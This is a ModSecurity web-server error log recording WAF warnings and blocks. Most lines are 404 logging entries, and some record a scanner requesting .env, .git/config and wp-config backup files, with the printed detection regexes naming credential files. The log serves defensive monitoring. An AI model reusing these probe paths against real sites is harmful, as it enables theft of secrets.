[Tue May 26 14:49:32.586141 2026] [security2:error] [pid 648203:tid 648438] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlpLEQDDtxJNiDrdTnZQAAAO4"]
[Tue May 26 14:49:32.599671 2026] [security2:error] [pid 648203:tid 648352] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlpLEQDDtxJNiDrdTnYgAAAJg"]
[Tue May 26 14:49:32.604112 2026] [security2:error] [pid 648203:tid 648397] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlpLEQDDtxJNiDrdTnZAAAAMU"]
[Tue May 26 14:49:32.654948 2026] [security2:error] [pid 648203:tid 648400] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlo7EQDDtxJNiDrdTnWgAAyGU"]
[Tue May 26 14:49:32.670281 2026] [security2:error] [pid 648203:tid 648418] [client 45.148.10.5:11892] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.landsonlogistics.com.onesoft.in"] [uri "/wp-config.php.backup"] [unique_id "ahVlpLEQDDtxJNiDrdTnbQAAANo"]
[Tue May 26 14:49:32.805997 2026] [security2:error] [pid 648203:tid 648228] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/.env"] [unique_id "ahVlpLEQDDtxJNiDrdTncAAAlBg"]
[Tue May 26 14:49:32.845585 2026] [security2:error] [pid 648203:tid 648232] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/.env.bak"] [unique_id "ahVlpLEQDDtxJNiDrdTneQAAlBw"]
[Tue May 26 14:49:32.845891 2026] [security2:error] [pid 648203:tid 648330] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/.env.backup"] [unique_id "ahVlpLEQDDtxJNiDrdTnfAAAlH4"]
[Tue May 26 14:49:32.887073 2026] [security2:error] [pid 648203:tid 648381] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlpLEQDDtxJNiDrdTndAAAALU"]
[Tue May 26 14:49:32.896242 2026] [security2:error] [pid 648203:tid 648371] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlpLEQDDtxJNiDrdTndQAAAKs"]
[Tue May 26 14:49:32.921261 2026] [security2:error] [pid 648203:tid 648406] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlpLEQDDtxJNiDrdTngAAAAM4"]
[Tue May 26 14:49:32.922077 2026] [security2:error] [pid 648203:tid 648239] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/.docker/laravel/app/.env"] [unique_id "ahVlpLEQDDtxJNiDrdTnggAAlCM"]
[Tue May 26 14:49:32.923688 2026] [security2:error] [pid 648203:tid 648369] [client 69.48.202.178:50156] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahVlpLEQDDtxJNiDrdTnbgAAAKk"], referer: https://www.cagmedya.com/erzurum-web-tasarim/
[Tue May 26 14:49:32.933172 2026] [security2:error] [pid 648203:tid 648398] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlpLEQDDtxJNiDrdTngQAAAMY"]
[Tue May 26 14:49:32.941877 2026] [security2:error] [pid 648203:tid 648349] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlpLEQDDtxJNiDrdTnUAAAAJU"]
[Tue May 26 14:49:33.023935 2026] [security2:error] [pid 648203:tid 648454] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlpLEQDDtxJNiDrdTniAAAAP4"]
[Tue May 26 14:49:33.029406 2026] [security2:error] [pid 648203:tid 648341] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlpLEQDDtxJNiDrdTnhwAAAI0"]
[Tue May 26 14:49:33.047014 2026] [security2:error] [pid 648203:tid 648373] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlpLEQDDtxJNiDrdTnjwAAAK0"]
[Tue May 26 14:49:33.047289 2026] [security2:error] [pid 648203:tid 648348] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlpLEQDDtxJNiDrdTnjQAAlBk"]
[Tue May 26 14:49:33.101056 2026] [security2:error] [pid 648203:tid 648240] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/.env.old"] [unique_id "ahVlpbEQDDtxJNiDrdTnlwAAlCQ"]
[Tue May 26 14:49:33.119051 2026] [security2:error] [pid 648203:tid 648416] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlpbEQDDtxJNiDrdTnkgAAANg"]
[Tue May 26 14:49:33.172864 2026] [security2:error] [pid 648203:tid 648366] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlpbEQDDtxJNiDrdTnqAAAAKY"]
[Tue May 26 14:49:33.177092 2026] [security2:error] [pid 648203:tid 648440] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlpbEQDDtxJNiDrdTnpwAAAPA"]
[Tue May 26 14:49:33.177354 2026] [security2:error] [pid 648203:tid 648435] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlpbEQDDtxJNiDrdTnpgAAAOs"]
[Tue May 26 14:49:33.178423 2026] [security2:error] [pid 648203:tid 648358] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlpbEQDDtxJNiDrdTnpQAAAJ4"]
[Tue May 26 14:49:33.183161 2026] [security2:error] [pid 648203:tid 648408] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlpbEQDDtxJNiDrdTnowAAANA"]
[Tue May 26 14:49:33.184697 2026] [security2:error] [pid 648203:tid 648441] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlpbEQDDtxJNiDrdTnpAAAAPE"]
[Tue May 26 14:49:33.190658 2026] [security2:error] [pid 648203:tid 648334] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlpbEQDDtxJNiDrdTnqQAAAIY"]
[Tue May 26 14:49:33.191017 2026] [security2:error] [pid 648203:tid 648240] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.leakyleaks.moes-art.com"] [uri "/.env.php"] [unique_id "ahVlpbEQDDtxJNiDrdTnmAAAlCQ"]
[Tue May 26 14:49:33.252565 2026] [security2:error] [pid 648203:tid 648246] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/.env.swp"] [unique_id "ahVlpbEQDDtxJNiDrdTnuQAAlCo"]
[Tue May 26 14:49:33.320282 2026] [security2:error] [pid 648203:tid 648340] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlpbEQDDtxJNiDrdTntAAAAIw"]
[Tue May 26 14:49:33.334212 2026] [security2:error] [pid 648203:tid 648251] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/.env~"] [unique_id "ahVlpbEQDDtxJNiDrdTnygAAlC8"]
[Tue May 26 14:49:33.334892 2026] [security2:error] [pid 648203:tid 648352] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlpbEQDDtxJNiDrdTnvQAAAJg"]
[Tue May 26 14:49:33.336127 2026] [security2:error] [pid 648203:tid 648427] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlpbEQDDtxJNiDrdTnvwAAAOM"]
[Tue May 26 14:49:33.339973 2026] [security2:error] [pid 648203:tid 648437] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlpbEQDDtxJNiDrdTnvgAAAO0"]
[Tue May 26 14:49:33.340372 2026] [security2:error] [pid 648203:tid 648367] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlpbEQDDtxJNiDrdTntQAAAKc"]
[Tue May 26 14:49:33.347846 2026] [security2:error] [pid 648203:tid 648397] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlpbEQDDtxJNiDrdTnwgAAAMU"]
[Tue May 26 14:49:33.386036 2026] [security2:error] [pid 648203:tid 648417] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlpbEQDDtxJNiDrdTnxQAAANk"]
[Tue May 26 14:49:33.420109 2026] [security2:error] [pid 648203:tid 648422] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlpbEQDDtxJNiDrdTn0QAAAN4"]
[Tue May 26 14:49:33.425851 2026] [security2:error] [pid 648203:tid 648381] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlpbEQDDtxJNiDrdTnzAAAALU"]
[Tue May 26 14:49:33.444568 2026] [security2:error] [pid 648203:tid 648378] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlpbEQDDtxJNiDrdTn3QAAALI"]
[Tue May 26 14:49:33.445120 2026] [security2:error] [pid 648203:tid 648369] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlpbEQDDtxJNiDrdTn0gAAAKk"]
[Tue May 26 14:49:33.453373 2026] [security2:error] [pid 648203:tid 648451] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlpbEQDDtxJNiDrdTn2wAAAPs"]
[Tue May 26 14:49:33.455589 2026] [security2:error] [pid 648203:tid 648424] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlpbEQDDtxJNiDrdTn2gAAAOA"]
[Tue May 26 14:49:33.460076 2026] [security2:error] [pid 648203:tid 648356] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlpbEQDDtxJNiDrdTn3gAAAJw"]
[Tue May 26 14:49:33.489866 2026] [security2:error] [pid 648203:tid 648218] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/.git/config.old"] [unique_id "ahVlpbEQDDtxJNiDrdTn6AAAlA4"]
[Tue May 26 14:49:33.490284 2026] [security2:error] [pid 648203:tid 648225] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/.git/config.bak"] [unique_id "ahVlpbEQDDtxJNiDrdTn5wAAlBU"]
[Tue May 26 14:49:33.494772 2026] [security2:error] [pid 648203:tid 648405] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlpbEQDDtxJNiDrdTn4QAAAM0"]
[Tue May 26 14:49:33.507179 2026] [security2:error] [pid 648203:tid 648236] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/.git/config~"] [unique_id "ahVlpbEQDDtxJNiDrdTn6wAAlCA"]
[Tue May 26 14:49:33.559338 2026] [security2:error] [pid 648203:tid 648387] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlpbEQDDtxJNiDrdTn5AAAALs"]
[Tue May 26 14:49:33.566230 2026] [security2:error] [pid 648203:tid 648335] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlpbEQDDtxJNiDrdTn6QAAAIc"]
[Tue May 26 14:49:33.584162 2026] [security2:error] [pid 648203:tid 648391] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlpbEQDDtxJNiDrdTn7gAAAL8"]
[Tue May 26 14:49:33.591054 2026] [security2:error] [pid 648203:tid 648377] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlpbEQDDtxJNiDrdTn8QAAALE"]
[Tue May 26 14:49:33.615172 2026] [security2:error] [pid 648203:tid 648440] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlpbEQDDtxJNiDrdTn9AAAAPA"]
[Tue May 26 14:49:33.674972 2026] [security2:error] [pid 648203:tid 648441] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlpbEQDDtxJNiDrdTn9wAAAPE"]
[Tue May 26 14:49:33.698720 2026] [security2:error] [pid 648203:tid 648360] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlpbEQDDtxJNiDrdToAgAAAKA"]
[Tue May 26 14:49:33.699068 2026] [security2:error] [pid 648203:tid 648361] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlpbEQDDtxJNiDrdToBwAAAKE"]
[Tue May 26 14:49:33.700828 2026] [security2:error] [pid 648203:tid 648402] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlpbEQDDtxJNiDrdToCAAAAMo"]
[Tue May 26 14:49:33.701126 2026] [security2:error] [pid 648203:tid 648338] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlpbEQDDtxJNiDrdToBQAAAIo"]
[Tue May 26 14:49:33.706457 2026] [security2:error] [pid 648203:tid 648394] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlpbEQDDtxJNiDrdToBAAAAMI"]
[Tue May 26 14:49:33.706581 2026] [security2:error] [pid 648203:tid 648438] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlpbEQDDtxJNiDrdToCQAAAO4"]
[Tue May 26 14:49:33.724338 2026] [security2:error] [pid 648203:tid 648392] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlpbEQDDtxJNiDrdToDwAAAMA"]
[Tue May 26 14:49:33.896305 2026] [security2:error] [pid 648203:tid 648433] [client 8.217.181.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVlpbEQDDtxJNiDrdToJwAAAOk"]
[Tue May 26 14:49:33.928695 2026] [security2:error] [pid 648203:tid 648453] [client 209.50.161.211:33991] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlpLEQDDtxJNiDrdTndwAAAP0"], referer: https://velanstore.ca/wp-login.php
